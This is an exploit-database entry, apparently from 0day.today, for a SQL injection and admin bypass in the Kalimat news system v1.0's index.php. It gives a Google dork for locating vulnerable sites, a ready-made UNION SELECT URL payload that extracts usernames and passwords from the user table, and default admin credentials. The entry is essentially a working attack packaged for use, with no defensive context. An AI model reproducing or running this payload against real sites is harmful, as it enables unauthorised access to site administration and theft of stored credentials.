kalimat new system v 1.0 (index.php) SQL Injection

2009-11-16T00:00:00
ID 1337DAY-ID-9989
Type zdt
Reporter ProF.Code
Modified 2009-11-16T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================
kalimat new system v 1.0 (index.php) SQL Injection
==================================================

=====================================
| kalimat v 1.0 admin by pass (index.php)
=====================================
Author: ProF.Code
=====================================
~~~~~~~~~~~~~~~~~~~~
dork(google) : intext:"Kalimat news system v 1.0"
~~~~~~~~~~~~~~~~~~~~
demo: http://server/kalimat/index.php?main=nc&id=12%20and%201=0%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,concat%28ur,0x3a,ps%29,11,12,13,14,15%20from+user
user : admin
pass : pass
=============================================================



#  0day.today [2018-01-05]  #